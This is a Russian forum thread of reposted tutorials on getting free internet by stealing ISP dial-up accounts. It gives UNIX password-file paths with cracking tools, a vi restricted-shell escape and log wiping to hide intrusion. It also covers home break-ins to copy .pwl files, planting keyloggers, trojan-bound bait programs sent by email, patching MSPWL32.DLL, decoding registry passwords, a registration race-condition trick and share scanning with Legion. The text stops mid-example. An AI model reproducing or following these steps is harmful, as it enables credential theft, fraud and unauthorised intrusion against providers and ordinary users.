Форум » Crack » Инфа про взлом прова, добычи интернета... » Ответить

Инфа про взлом прова, добычи интернета...

Andrew: Итак, давайте разберемся, что такое хакинг. Как известно, все программы не идеальны, то есть они не защищены от наличия ошибок (багов/bugs). Значит, мы можем воспользоваться недочетами системы, правильно? Да! Бьюсь об заклад, что Вам бешено хочется скорее узнать о том, как бы ’хакнуть’ провайдера и сидеть в Интернете на халяву. Ладно, я приоткрою для Вас эту завесу и расскажу несколько основных принципов взлома и о взломе провайдера вообще. Во-первых, надо узнать, на какой платформе стоит провайдер. Сделать это можно обычной утилитой ftp, которая входит в состав Windows. Итак, присоединяемся к прову по ftp. Делается это так. К примеру, доменное имя вашего прова - glassnet.ru. Открываем Пуск/Выполнить и пишем ftp. Жмем enter. Поясняю: ftp - это утилита для перенесения файлов с компа на комп, то есть File Transfer Protocol. Итак, мы в невзрачном окне, и перед нами подсказка системы ftp. Пишем «open glasnet.ru» - что мы написали? Мы подсоединились к glasnet.ru, и все! Перед вами поле для ввода логина и пароля, но выше написано, в какой вы системе. Скорее всего, будет что-нибудь из UNIX’овских операционок. Вам, конечно же, нужен файл с паролями и логинами. Вот где он может быть (в зависимости от типа UNIX’а): AIX 3 - /etc/security/passwd ! /tcb/auth/files/[first letter of username]/[username] A/UX 3.0s - /tcb/files/auth/?/* BSD4.3-Reno - /etc/master.passwd * ConvexOS 10 - /etc/shadpw * ConvexOS 11 - /etc/shadow * DG/UX - /etc/tcb/aa/user/ * EP/IX - /etc/shadow x HP-UX - /.secure/etc/passwd * IRIX 5 - /etc/shadow x Linux 1.1 - /etc/shadow * OSF/1 - /etc/passwd[.dir¦.pag] * SCO UNIX #.2.x - /tcb/auth/files/[first letter * username]/[username] SunOS4.1+c2 - /etc/security/passwd.adjunct ##username SunOS 5.0 - /etc/shadow[optional NIS+ private secure maps/tables/whatever] System V Release 4.0 - /etc/shadow x System V Release 4.2 - /etc/security/* database Ultrix 4 - /etc/auth[.dir¦.pag] * UNICOS - /etc/udb * Предположим, что Вы установили тип ОС провайдера и взяли файл с паролями (о том, как его взять, мы поговорим позже). И что же Вы видите: striker:5gg57G422dfhj:98:10:Striker:DjStriker:/hom e/sc/sun:/bin/bash. Это что еще за монстр? А где пароль, а где логин? Объясняю: это можно перевести так: 1) Имя пользователя: Striker; 2) Расшифровка пароля: 5gg57G422dfhj; 3) Номер пользователя: 98; 4) Номер группы: 10; 5) Информация GECOS: DjStriker; 6) Каталог по умолчанию: /home/sc/sun 7)Shell: /bin/bash. Да, но как расшифровать пароль? Да очень просто. Берем прогу под названием John The Ripper, эта прога перебирает все комбинации или пользуется готовым словарем возможных комбинаций. Хочу сразу предупредить, что пароли могут раскриптироваться довольно долго! Нормальные пароли типа he_!$*74 будут разгадываться лет пять!!! Не беспокойтесь, есть же и другие пароли у людей. Программу можно взять здесь: http://www.false.com/security/john/index.html или поищите ее на http://astalavista.box.sk/. Ну, теперь о самом больном, о том, как бы взять этот файл от провайдера. Для начала надо обучиться UNIX грамотности. Я уже говорил, что каждый хакер должен знать UNIX, так вот вам несколько UNIX команд: batch - выполнение команд в процессе загрузки chmod - этой командой вы можете изменить полномочия файлового доступа chown - был у файла один хозяин, стал другой cron - это демон команд batch и at crontab - можно указать промежутки времени, в течение которых будут выполнены какие-либо команды ftp - работа с удаленным компом, принимаем или пересылаем файлы kill - послать некоторому процессу сигнал о конце работы logname - получить регистрационное имя pwcheck - проверить файл паролей (/etc/passwd - по умолчанию) mail - прием или пересылка е-message who - отобразить список текущих юзеров telnet - доступ к удаленному компу umask - маска полномочий для нового файла news - отобразить статью из конференции Usenet whois - получить инфу о текущем пользователе write - переслать записку все тому же текущему пользователю uux - выполнение команд UNIX на удаленном компе nslookup - получить сведения об IP-адресе домена uucp - rопировать файлы из одного компа UNIX в другой uuname - отобразить список хостов UUCP su - если умело применить, то можно стать привилегированным пользователем, я точно не знаю о применении команды su rm - стереть файл или каталог sleep - не выполнять команду на данное время passwd - создать/изменить пароль ps - посмотреть, какие процессы на данный момент активизированы.

Ответов - 10

Andrew: Побродив по сети вы легко сможете обнаружить ссылки типа Взломай Инет! Хакни провайдера! и др. в этом стиле. Кликать на такие ссылки не имеет абсолютно никакого смысла. Вопрос: «Почему? А я хочу бесплатно». Ответ: Сначала чётко разберёмся, что мы понимаем под термином «взломать Инет или провайдера»: получить Login и Password, введя которые в окне терминала мы сможем лазить в Инете за чужой счёт. Получить их действительно можно. Но все данные ссылки обычно ведут к страницам, где предлагается скачать прогу, якобы взламывающую провайдера. Все подобные проги - трояны. Они даже иногда находят корректные Логин и Пароль (Ваши) и отсылают их мылом (или по Асе) «Хозяину». Таких троянов существует множество. Это - всего-лишь одна из разновидностей, отличающаяся большим процентом «попадания»: в инструкции описан полный набор действий «для взлома провайдера», жертва всё делает, и, в результате оказывается «на крючке». Вопрос: «Так всё-таки, как мне бесплатно лазить в интернете?» Ответ: Существует достаточно много способов похитить пароли. Я разделил всё это на две категории: Похищение с сервера Похищение у юзера Похищение с сервера: В результате удачного «взлома» сервера получаем зашифрованный файл с паролями, а затем расшифровываем его и получаем необходимые нам пароли. Обычно провайдеры используют UNIX сервера, в которых файл с паролями хранится в папке etc под именем passwd (/etc/passwd). Естественно, пароли - зашифрованы, а программы дешифрации - не существует :-(. Но не спеши обламываться, есть способ узнать пароль: алгоритм шифрования известен. Прога John the Ripper (скока у них Джонов?) берёт пароль, шифрует его и сравнивает с тем, что написано в файле. Если совпадает - ура!, если нет - берёт следующий. Так при мощном компе за несколько суток можно получить несколько паролей (логины не шифруются. Итак, главное - достать этот файл, а дальше - дело техники. На любом UNIX’е пароли хранится в файле /etc/passwd но очень часто (не у всех провайдеров админы - лохи) в этом файле пишут что-то наподобие *, а настоящие пароли хранятся в другом месте. Поискать можно в следующих местах: /etc/security/passwd /tcb/auth/files// /tcb/files/auth/?/ /etc/master.passwd /etc/shadpw /etc/shadow /etc/tcb/aa/user/ /.secure/etc/passwd /etc/passwd[.dir¦.pag] /etc/security/passwd.adjunct ##username /etc/shadow /etc/security/* database /etc/auth[.dir¦.pag] /etc/udb Результат не гарантирован, но шансы есть. В крайнем случае воспользуйтесь прграммой getpwent (), которая отлавливает файл с паролями на наиболее мудрёных серверах. Итак, у тебя уже есть файл с паролями, и ты, естественно, не знаешь, что с ним делать. Суй его в лапы John’у (который the Ripper) и наслаждайся Инетом (через неделю примерно). Естественно, нужно замести следы. Следы - это файлы /etc/utmp, /usr/adm/wtmp и /usr/adm/lastlog. Редактируй их с помощью специальной утилиты. Недостаток этого способа в том, что многи провайдеры ставят у себя систему с мудрёным названием NIS(Network Information Server)/YP (Yelow Pages). Тогда вместо пароля пищется что-то типа +::0:0::: Если случилось подобное несчастье, поищи другого провайдера (или переходи ко второму способу). К этому вернёшься годика через два. Окрепший, с кучей новых прог и утилит, Супер Хакер, герой своего народа. Похищение у юзера: Можно похитить пароль непосредственно у юзера (с его компа или при вводе самим юзером). В результате удачного «похищения» получаем один пароль. Тут, естественно не обойтись без специальных прог. Далее привожу несколько сценариев возможных действий. Саботаж Проникаешь на хату к юзеру и получаешь доступ к его компьютеру. Ищешь в директории виндов по следующей маске: *.pwl Если чё нашел - копируй на дискету. Смотришь свойства удалённых соединений. Если там задействован сценарий - смотри путь к нему, хапай файл на дискету и беги с его хаты поскорей. Если ты схапал pwl’шник - скачивай PWLHack (или что подобное), суй ей в зубы свою находку и жди. Потом получишь кучу паролей. Правильный найдёшь методом «научного тыка». Если не удались пункты 2-5 устанавливай юзеру какую-нибудь прогу, просекающую появление окна терминала и хапающую нажатия клавиш (можно также записать все нажатия за день, а потом рыться в логе) На следующий день приходи, снимай прогу, копируй файл лога на дискету и дуй оттуда. * П. 7 можно выполнять не на слудующий день, а через некоторое время, убедившись в том, что юзер соединялся с Инетом (напр. говоришь: «Проверь почту!») Болтун - находка для шпиона Меня многие упрекают в невозможности осуществления данного метода, но, поверьте мне, есть и такие лохи-юзеры, как описано в сценарии. Проникаешь на хату к юзеру и получаешь доступ к его компьютеру. Ставишь прогу, срабатывающую где-то через неделю, которая вызывает частые зависания компьютера, причём явно «связанные с интернетом» (напр. комп зависае при открытии окна терминала). Входишь к нему доверие с тем, чтобы он позвал тебя для устранения «зависаний». Приходишь к нему, расспрашиваешь про проблемы. Проверяешь всё и убеждаешься в «конкретных проблемах». Говоришь: «Чтобы всё исправить необходим логин и пароль интернета». Удаляешь прогу и получаешь «гонорар» (кстати, подобное можно делать только ради этого). *Юзер должен быль полным чайником. Можно также вместо п.4 перейти к п. 6 предыдущего сценария. Камуфляж Этот сценарий работает в том случае, если вы не можете получить доступ к компу жертвы, но знаете его e-mail хотя-бы. Скачиваешь прогу Sub7, Net Bus или Back Orifice. (в дальнейшем - троян) Пишешь прогу-приманку* На неё ты будешь ловить юзера. «Склеиваешь» специальной прогой сервер трояна с приманкой. Мылом например отсылаешь письмо с вложенным в него трояном, а в письме расхваливаешь прогу-приманку так, чтобы юзер обязательно запустил exe’шник. (Я думаю, ты не будешь посылать это письмо с провайдерского адреса, а пошлёшь его с какого-нибудь левого сервака, на котором создан твой аккаунт, в котором нет ни малейшего намёка на информацию о тебе). Сервер трояна присылает тебе IP жертвы. Сидишь и караулишь жертву в Инете. Как только обнаружишь его, закачиваешь ему прогу, следящую за нажатиями клавишь и запускаешь её. На следующий/через день опять караулишь юзера. Скачиваешь лог, в котором ищешь Логин И Пароль. Ура!!! (Необязательно) Мучаешь юзера всякими приколами из троянского арсенала (окна с ошибками, принтер печатает всякую чухню, сидюк открывается и т. п.) *Прога-приманка пишется для того, чтобы юзер запустил прогу-троян, «склеенную» с ней. Её расхваливают как могут, например: Патч для Quake 8. Обновление Quake до восьмой версии. Обновление ICQ до 21 версии. Ускорение Инета в 10 раз. Ищет и уничтожает CIH (вирус). Свой вариант. Приманка делает что-нибудь из следующего списка: Мессадж-бокс с сообщением (типа «mfc50.dll not found. Programm now well terminated.») - самое простое. Показывает порно-картинки (можно также вставить ещё одну в тело сообщения). Проверяет на вирус (какой-то, который не может обнаружить не один коммерческий антивирус.) Пишет красивым шрифтом (с эффектами какими-то) какой-то текст (напр. поздравляет с Новым Годом). Свой вариант (если фантазией не обделён). Что делать дальше? Итак, если ты всё сделал правильно, ты имеешь Логин и Пароль для входа в Инет за чужой счет. Если ты «хакнул» сервер, у тебя их с десяток-два (три и больше). Если «похитил» у юзера - один. Этого явно не достаточно. Хакни ещё хотя-бы трёх-четырёх (чем больше, тем лучше). Вопрос: «Зачем ещё, у меня есть один, мне хватит!?.). Ответ: Как ты думаешь, хакеров ловят или нет (угадай с двух попыток)? Правильный ответ - да. Как? А очень просто (применительно только к нашему случаю): При работе в Инет, обладатель «хакнутого» аккаунта получает счёт за очень большое количество часов. Он сообщает провайдеру: «Эй ты, пень паганый, я работаю в месяц только 15 часов, а плачу за 152». Провайдер просекает фишку, и начинается «охота». Тут уж тебе не с добровать. Конечно, скорее всего, провайдер просто поменяет пароль. Ты сидишь в Инете. В это время юзер лезет в Инет, чтобы отправить письмо маме в Сибирь. Ему сообщение (в переводе на русский): «Иди отсюда, тут уже один перец сидит». Юзер всё рассказывает провайдеру и тот меняет пароль (в лучшем случае). Юзер сидит в Инете. Ты коннектишься, получаешь сообщение. Провайдер его видит в логе, просекает фишку и ... Вопрос: «Во блин, а шо ж делать?». Ответ: Стараться сидеть поночам. В это время ламера спят. Подключаться каждый раз по другому Логину (напиши прогу, которая, например, будет случайным образом заменять файл сценария.) Стараться Хакать юзеров с неограниченным доступом - ему пофигу наработанные часы. (впрочем, тут есть другая сторона медали: он больше сидит в Инете, следовательно, ты будешь долго ждать, пока он набазарится в своём дурацком чате.

Andrew: Статья, пpедлагаемая вашему вниманию, может оказаться полезной только в том случае, если ваш пpовайдеp использует опеpационную систему UNIX, имеющую shell-доступ. Если у вас нет UNIX-shell’a в сеpвеp пpовайдеpа, вы можете официально купить его или подобpать (только на слабо защищенных системах) паpоль (UNIX/UNIX; ROOT/ROOT; ADMIN/ADMIN; SHELL/SHELL; GUEST/GUEST и т.д.). Hа любом UNIXe (если не используется система специальной защиты) файл с паpолями находится в диpектоpии etc, в файле passwd. Файл, конечно, зашифpован и пpогpаммы для его обpатного декодиpования пpосто не существует, но есть дpугая возможность: Кодиpовать слова (возможные паpоли) и сpавнивать получившийся кодиpованный ваpиант со всеми зашифpованными паpолями в файле passwd. Хакеpы создали пpогpаммы, делающие это автоматически, но для полноценной pаботы вам понадобится довольно быстpый компьютеp и хоpоший словаpь с возможными паpолями. Hа моей памяти самый полный словаpь занимал 10 мегабайт дискового пpостpанства и помог вскpыть более 200 паpолей пользователей известного pоссийского пpовайдеpа. Из всего, что я встpечал, самая лучшая пpогpамма для дешифpации паpоля под UNIX была Crack Алека Муфетта, а под DOS - CrackerJack. Hекотоpые пpовайдеpы используют систему скpытия паpолей, в этом случае вместо шифpованного паpоля можно будет увидеть что-то наподобии *, а настоящие шифpованные паpоли находятся в дpугом месте. Если вы имеете дело с таким пpовайдеpом, не pасстpаивайтесь, у вас все pавно есть шанс стать обладателем десяточка паpолей пользователей. Для начала попpобуйте поискать спpятанный файл с паpолями в следующих местах: /etc/security/passwd /tcb/auth/files/ ‹first letter of username›/‹username› /tcb/files/auth/?/ /etc/master.passwd /etc/shadpw /etc/shadow /etc/tcb/aa/user/ /.secure/etc/passwd /etc/passwd[.dir¦.pag] /etc/security/passwd.adjunct ##username /etc/shadow ‹optional NIS+ private secure maps/tables/whatever› /etc/shadow /etc/security/* database /etc/auth[.dir¦.pag] /etc/udb Hо может быть и так, что нужного pезультата от поиска в этих диpектоpиях вы не добьетесь. Тогда вам пpидется воспользоваться специально написанной пpогpаммой для отлова файла с паpолями. Эта пpогpамма, котоpая pаботает на многих системах (хотя не на всех). Пpогpамма называется getpwent (), ее исходник можно найти на сеpвеpе (www.spider.ru) в pубpике «ХАКЕРЫ». Еще одна возможная непpиятность связанная с дешифpацией файла с паpолями может случится тогда, когда вы откpоете файл passwd и увидите там что-то похожее на: +::0:0:::. Это говоpит о том, что в системе использована система NIS(Network Information Server)/YP (Yelow Pages). Если у вас возникла такая пpоблема, то вам будет необходимо воспользоваться командой «ypcat passwd» для пpосмотpа настоящего файла с паpолями. Если вам пpидется доставать файл с паpолями под VMS, то попpобуйте посмотpеть SYS$SYSTEM:SYSUAF.DAT. Для взлома паpолей под VMS вам надо воспользоваться пpогpаммой CHECK_PASSWORD или GUESS_PASSWORD, а если у вас есть навыки пpогpаммиpования, то вам будет не сложно написать пpогpамму, котоpая будет сpавнивать кодиpованные слова из вашего словаpя с паpолями из файла. Иногда для взлома пpовайдеpа тpебуется взломать огpаниченный shell-доступ. Для этого вам следует запустить пpогpамму vi и использовать эту команду: set shell=/bin/sh, после чего shell использует следующую команду :shell. И так, если вам удалось выудить несколько паpолей пользователей из passwd, то вам следует «замести следы». Это делается довольно пpосто, вам надо будет отpедактиpовать файлы /etc/utmp, /usr/adm/wtmp, /usr/adm/lastlog. Пpавда эти файлы написаны не откpытым текстом и pуками пpи помощи vi отpедактиpовать вам его не получится, пpидется воспользоваться специальной пpогpаммой, исходник котоpой вы можете найти на сеpвеpе www.spider.ru в pубpике «ХАКЕРЫ».

Andrew: СТАТЬЯ! «Все началось, когда я в очередной раз не смог забрать почту... «линия занята», видите ли. В принципе, нормальное явление для такого сверх-рулезного прова, как ROL. Ну вот, сижу я, в общем, и думаю: 1)РОЛовцы - жмоты!!! 2)Юзеров понабежало немерено. 3)Сервак, регящий пользователей, тормозит (следствие двух предыдущих умозаключений). 4)Во время регистрации надо указать код карты. Наверняка, сервак долго удаляет этот самый код из базы! Наверняка, можно по одному номеру несколько логинов зарегить! FUCK!!!! Это было бы круто :) Ну что ж, попробуем.. Порядок действий 1) Переступаешь через все свои принципы и отдаешь 10 уЁв милой девушке в палатке у метро. В ответ на что, она... да ничего она не снимает, она просто дает тебе красивую карточку в ультрапрозрачном полиэтилене. 2) По дороге домой затариваешься пивом с сухариками. 3) Приходишь, включаешь комп, достаешь карту. Коннектишься к демо-доступу (start.online.ru). Понеслось! Кликаешь по надписи «регистрация», удерживая Shift, раз так 5. Должно открыться 5 окон с регистрацией. Заполняешь все поля во всех окнах. Далее. Просят ввести код карты. Вводишь во все окна один и тот же. Далее. Просят ввести логин? Введи во все окна. Только «далее» не жми. Распредели все окна по экрану так, чтобы можно было быстреe кликнуть в каждое из них. Распределил? Вы - пей пивка. Сосредоточься. Сейчас от тебя потребуется сдать норматив ГТО по скоростному клику. В общем, тебе надо кликнуть в каждом окне на «далее» за минимально возможный промежуток времени. Кликнул? YYYYYYYEEEEEESSSSSS!!!! Ты видишь пять окошек. В трех из них - красивые загогулины с твоим логином, паролем и балансом. А вот в остальных двух - злые красные надписи про левый код активации. Это значит - не успел. Медленно кликал. Ну вот, собственно, и все :). Правда, просто? А почему все это работает? Да потому что произошла ситуация под названием «жадность фраера сгубила». В «раше оф лайн» ребятам на новый сервак денег жалко, а старый конкретно тормозит. Но при этом они проводят массированную рекламную компанию и нахватали уже немереное количество юзеров. Им бы потратить часть денег на новое оборудование, на новые модемные пулы, а они жмут. Вот сервер и не успевает удалять номера карт из базы, а телефоны дозвона часто заняты. Совет Заниматься данным развратом желательно с 19:00 до 00:00. В это время у сервака наибольшая тормознутость. Итого, за 10 вшивых президентов - целых 60 часов безуспешной прозвонки :))). Шутка. Нормальная прозвонка - через пул 363-3366 к логину просто прибавляешь свой телефон. Это называется «Обратный вызов». Денег дополнительных не берут:), а радости - хоть маму жги :). Кстати, вполне вероятно, что данная фича прокатит и с другими провами. Элвис там, Ситилайн, Комстар, CNT, IP corn, etc. С МТУ, как это ни прискорбно, облом получился великий - угрохал пять баксов. Просто так. Ну не совсем, конечно, просто так. Посидел часиков шесть, насладился скоростью в совокупности с прозвонкой, и обратно в суровую реальность, смотреть на «Сервер не отвечает». Вот так вот... И никаких тебе троянов и заморочек. Все очень просто (если ты все-таки что-то не понял - пиши, объясню), законно (а что ты нарушил?) и быстро (no comments:)). 2 РОЛ: ребята, не жадничайте на нас, юзе-рах, и все у вас будет зашибись!»


Andrew: :::Бесплатный Интернет (часть №1)::: Все изложенное ниже предназначено только для ознакомления с возможной опасностью и ни в коем случае не должно быть использовано, если это причинит ущерб каким-либо физическим или юридическим лицам. Это может повлечь за собой административную или уголовную ответственность в соответствии с действующим законодательством. Вступление Во все времена были люди, которые старались что-либо утаить от других. Но были и другие: те, которые с этим были не согласны и всячески старались тайны первых узнать. И вот придумали первые вход в Интернет с паролем, ибо денег сие удовольствие стоит, а вторые сразу начали этот пароль отыскивать всеми возможными и невозможными способами. Когда-то давно пароль пользователь мог выбирать сам. С одной стороны, это было очень удобно: если сам слово заветное это придумал, то уж не забудешь никогда (если только пребывал в этот момент в здравом уме и твердой памяти, но это уже к делу не относится). Пароль же выбирался не просто так: для указанного индивидуума он, чаще всего, нес определенную смысловую нагрузку. И было в этом слабое место данного метода. Теперь только в дешевых фильмах можно увидеть некоего гражданина, копающегося в мусорной корзине своей жертвы в надежде узнать имена, фамилии, даты рождения всех родственников таковой вплоть до десятого колена, а также клички всех их собак, кошек, крыс, хомяков и тараканов. А как же еще: что тебе, например, первым приходит на ум? Конечно: имя твоей (а чаще не твоей) подружки или кличка замученного домашнего животного, ну или слово какое непотребное. Наиболее продвинутые хакеры начали составлять специальные словари с учетом наиболее часто встречающихся в паролях слов. Все это, в конце концов, положило конец первой стадии и началась вторая: теперь компьютер генерирует некоторую псевдослучайную последовательность букв, цифр и разных знаков препинания. Хорошо-то как стало: «Lta13?Lp» - попробуй подбери! Но тут возникла другая проблема: а попробуй-ка запомни! Пользователи наши начали их на бумажках записывать, ну и периодически... правильно: бумажки терялись, похищались, попадали в мусорную корзину и т.д. - от чего ушли, к тому и пришли! И тогда какая-то умная голова догадалась, что пароль можно хранить не в голове, а прямо на жестком диске. В DialUp-окне галочку поставить и запомнить пароль. У компьютера мозги кремниевые - ему все равно, что запоминать. Ну, а раз запомнили, то, само собой, и записать надо. Ну, а раз записать, то... правильно: отвернулся наш пользователь, а тут толпа голодных до Инета хакеров налетела - и пароль подсмотрела... И тогда пароли стали шифровать. Ну вот, наше вступление закончилось. Интимные подробности Где же хранятся пароли в Windows 95/98? Известно где, зашифрованные пароли в Windows 95/98 хранятся в основном каталоге, в файлах с расширением PWL. С учетом того, что не только «у нас здесь», но и «у них там» бывают персональные компьютеры коллективного пользования, да и сети локальные местами встречаются (правда, редко), на каждого пользователя заводится свой PWL. Кстати, название файла соответствует логину данного юзверя. Эти файлы, в принципе, зашифрованы достаточно прилично. Если кому-либо интересно, то, взяв в руки какой-нибудь дизассемблер (HIEW, QVIEW), можно посмотреть процедуру шифрования. Она находится в файле MSPWL32.DLL. Там все очень накручено. Имеется счетчик (назовем его N) от нуля до «сколько надо». Имеются три таблицы. В соответствии со счетчиком N берется байт из первой таблицы (X). По смещению X+N, урезанному до 8 бит, из второй таблицы берется другой байт (Y). Затем по адресу X+Y, опять же урезанному до 8 бит, из третьей таблицы берется третий байт (Z). После столь хитрых манипуляций командой XOR с байтом Z шифруется байт информации, после чего счетчик инкрементируется, и все повторяется сначала (как тебе, а?). Как формируются сами таблицы? Не знаю (мне было лень выяснять). Расшифровывается все это аналогично (той же процедурой), ибо команда XOR обратима. То, какие Винды у тебя стоят - значения не меняет. Не знаю уж, в чьих нездоровых мозгах могла появиться мысль использовать для шифрования команду xor byte ptr [eax+ebp],cl. Может, запутать хотели? Но команда уникальна, такие команды в обычных программах еще поискать надо. Стало быть, ищем соответствующую ей комбинацию 30h, 0Ch, 28h - и все дела. Дальше - просто. Берем MSPWL32.DLL и, со смещения 511h (или там, где найдем), ставим 90h, 90h, 90h - команды NOP (пустая операция). И все, команда не выполняется! Что при этом произойдет? Да ничего! Ничего страшного и даже не очень страшного. И даже никто ничего не заметит!!! Все останется как всегда, с одним лишь исключением: ВСЕ логины/пароли будут ВИДНЫ, так сказать, невооруженным глазом! Тут, правда, есть два неприятных момента. Во-первых, во время работы Windows тебе не удастся подобным образом надругаться над их «святая святых»: писать в этот файл нельзя. Значит, придется перегружаться в режиме эмуляции MS-DOS, а это лишнее время, которого может не быть. Во-вторых, а это еще хуже, тебе надо будет стереть ВСЕ PWL’ы, иначе даже в Windows не пустят: а вот тут у законных пользователей могут возникнуть лишние вопросы и подозрения. Я все так и сделал, скажешь ты, а вот тот юзер в Windows с паролем входил, а мне теперь не войти - пароля-то я не знаю. Что делать? Не беда! Есть способ проще! Уносим ТОЛЬКО USER.DAT! А теперь: Windows 95 - M. D.! Как тебе должно быть известно, кроме интерактивного доступа в Интернет, провайдеры еще и e-mail впаривают суповым набором. Так вот, чтобы залезть в твой почтовый ящик, в тот, что у тебя в подъезде, нужен ключ (или лом). Чтобы залезть в твой e-mail, нужен пароль (или виртуальный лом). И тут я скажу: ВСЕ ПОГОЛОВНО провайдеры в славном городе Москве - M. D.! Пароль к POP3-ящику всегда тот же, что и DialUp! Ну и что? А вот что. Пароль e-mail находится не в PWL’е, а в USER.DAT, и зашифрован он не так сильно, вернее, почти совсем не зашифрован! А это как??? Да вот так! Метод «шифрования» напоминает элементарное UUE-кодирование, иначе говоря, из трех байтов делают четыре или из 8 битов - 10. Весь исходный пароль разбивается на части по три байта. В результирующей строке на один символ отводится 10 битов. Теперь: к каждому байту исходной строки прибавляется 30h, если сумма больше, чем 7Ah, то он становится равен 30h, а к паре 9 и 10 битов добавляется единица. Однако есть исключения. Если общая длина строки пароля не кратна трем, то она дополняется байтами 3Dh. Судя по всему, это 0Dh (конец строки)+30h. В конце строки 0Dh, 0Ah: стандартное завершение. На мой взгляд, подобрать пароль вручную проще, чем написать соответствующую программу: не каждый же день ты эти пароли подбираешь! Где находится пароль - написано ниже, оттуда его и берем. А принцип прост: запускаем Internet Mail, заходим в Сообщение & reg; Параметры/Сервер. Запускаем REGEDIT, переходим в HKEY_CURRENT_USER/Software/Microsoft/InternetMail and News/Mail/POP3/«Твой сервер»: смотрим Password. Удаляем пароль в Internet Mail. Первый подбираемый символ влияет на первый и второй байты, второй - на второй и третий, третий - на третий и четвертый. Теперь: подбираем символ так, чтобы первый байт совпал с оригиналом, а второй или совпал, или был самый большой, но меньше оригинала. Аналогично для второго и третьего символов. С подбором третьего символа все четыре байта должны совпасть! Если нет - извини, no sex for you. Естественно, после каждой замены символа жми «Применить». Результат контролируем REGEDIT’ом, переходя вверх/вниз для обновления информации. Когда первые три символа подобраны, возвращаемся к (*) для следующих трех и т.д. до победного конца. Разумеется, байт(ы) 3Dh подбирать не нужно! После некоторой тренировки на все это уходит минут 15. Где же это счастье хранится? И, вообще, кроме логина и пароля еще многое нужно знать, а откуда, не звонить же провайдеру? Не надо никому звонить! Все в нем, в USER.DAT. HKEY_CURRENT_USER/RemoteAccess/Addresses: и мы имеем список подключений. Да, но там ничего не видно, цифры какие-то... А ты чего хотел, дружок! Выбираем байт, которого больше всего, и дешифруем им все остальные (обычный XOR). В результате в куче всякой ерунды получаем ASCII-строку с номером модемного телефона провайдера (потеть, конечно, придется, если друг совсем не знакомый или работает партизаном, а знакомого и спросить можно - типа: «Что это за провайдер у тебя такой не хилый, друг ты мой лучший, Миша»?). HKEY_CURRENT_USER/RemoteAccess/Profile/подключение /IP: со смещения 0Ch четыре байта задом наперед - это первичный DNS, затем еще четыре - вторичный и т.д. HKEY_CURRENT_USER/RemoteAccess/Profile/подключение /User: логин. HKEY_CURRENT_USER/Software/Microsoft/ Windows/CurrentVersion/InternetSettings/ProxyServe r: Proxy-сервер и порт. HKEY_CURRENT_USER/Software/Microsoft/InternetMail and News/Mail: DefaultPOP3Server: DefaultSMTPServer: SenderEMail: Name: Organization: это все и так понятно. POP3 - «POP3-сервер»: Account: это понятно. Password: ну вот и он, родимый. Что делать, если пользователь - мазохист? Не хранит он пароль в компьютере, а вводит его каждый раз с клавиатуры? И этому горю можно помочь. Существуют программы типа SPYWIN или HOOKDUMP или KEYWITNESS. Они записывают все действия, производимые на компьютере. Достаточно подсадить одну из них и все... Естественно, их можно использовать и для других не менее интересных целей. И в конце могу тебе посоветовать: не качай и уж тем более не запускай у себя всякие «взломщики Интернета». Они могут крякнуть только информацию на твоем винчестере! Ибо тот, кто может взломать провайдера, никогда не будет опускаться до таких мелочей, а другие в лучшем случае хотят над тобой просто посмеяться, в худшем - сделать бяку.

Andrew: :::Бесплатный Интернет (часть №2)::: А знаешь ли ты, друг мой, о том, как хакеры «вытаскивают» твои драгоценные аккаунты прямо у тебя из-под носа? Существует достаточно много случаев, когда пользователь с удивлением для себя обнаруживает, что за его счет бродит по просторам Интернет кто-то еще и, естественно, тратит направо и налево его потом и кровью заработанные деньги. Обнаружив столь неприятное происшествие, он в ярости (или в недоумении - кто как) звонит в техподдержку своего провайдера и объясняет причину своего недовольства. Провайдер приносит свои соболезнования, но, к сожалению, ничем помочь не может, однако, предлагает сменить пользователю пароль и советует не допускать до компьютера тех людей, которые не достойны доверия. А самое главное, что тем людям, которые платят свои деньги за часы, проведенные в Интернет, провайдер не собирается возмещать ни денег, ни времени. Разочаровавшись и обвиняя во всех мнимых грехах техническую поддержку, ты размышляешь о том, как же этому гадскому хакеру удалось украсть твой аккаунт, и с обидой в душе на этот жестокий мир подумываешь о смене провайдера. Итак, каким же образом хакер смог «вытащить» твой аккаунт? На сегодняшний день мне известны несколько методов, которые используют хакеры. Обычно многие юзеры, устанавливая Windows 95/98/NT под сети, предоставляют доступ к своим дискам и директориям другим пользователям сети, тем самым открывая лазейку в свой компьютер. Для того чтобы в сети найти компьютер с такой лазейкой, хакеру необходимо просканировать диапазон IP-адресов одной сетки. Что для этого нужно? Для Windows 95/98/NT - программа «Legion». После запуска этой программы нужно указать IP-адреса, которые будут использоваться для сканирования. Сначала хакер выбирает предполагаемого провайдера, услугами которого впоследствии он будет пользоваться. Например, это будет выдуманный нами провайдер www.lamerishe.ru. Запустив свой mIRC, он отправляется на всем знакомый IRC и в окошке «status» пишет: /whois *.lamerishe.ru Ответ не заставит себя ждать: #RUSSIAN Andrey H andrey@dialup-28059.lamerishe.ru :0 hello. *.junk.com End of /WHO list. Дальше следует команда: /dns Andrey И mIRC выдает ему IP-шник жертвы: *** Looking up dialup-28059.lamerishe.ru *** Resolved dialup-28059.lamerishe.ru to 121.31.21.10 Вот он уже и знает один из ip-адресов (121.31.21.10) нашего выдуманного провайдера. Теперь нужно указать диапазон IP-адресов этого провайдера. Хакер запускает Legion и заполняет поля «Enter Start IP» (введите начальный IP) и «Enter End IP» (введите конечный IP). Enter Start IP: 121.31.21.1 Enter End IP: 121.31.21.254 Остается только выбрать скорость соединения и нажать на кнопку «Scan». Если после сканирования, в правом окне сканера, появится что-то вроде »\\121.31.21.87\C», то в левом окне можно открыть этот IP и щелкнуть два раза на ответвлении «C». Появится сообщение «MAPPED ON DRIVE E:». Все это означает, что на данном IP есть машина, c незашаренным (то есть открытым для всех) диском С. И этот диск можно установить как еще один диск на своем компе. То есть у хакера на компе появится еще один диск (в данном случае - Е), по которому он будет лазить, как по своему собственному, хотя он и находится на удаленной машине. Конечно, главной целью для хакера является файл с расширением .pwl, в котором находится зашифрованный аккаунт. Этот файл лежит в каталоге Windows. И поэтому хакер заходит в «Пуск -› Программы -› Сеанс MS-DOS». Пишет там «e:» и нажимает Enter. Теперь он на жестком диске у чайника. Но каталог Windows может называться по-другому. Поэтому он пишет: E:\›dir win* и получает такой вот ответ: Том в устройстве Е не имеет метки Серийный номер тома: 2247-15D0 Содержимое каталога Е:\ WIN95 ‹КАТАЛОГ› 11-30-98 6:48p WIN95 0 файл(а,ов) 0 байт 1 каталог(а,ов) 287,997,952 байт свободно Дальше следуют команды: E:\›cd win95 E:\WIN95›dir *.pwl Том в устройстве Е не имеет метки Серийный 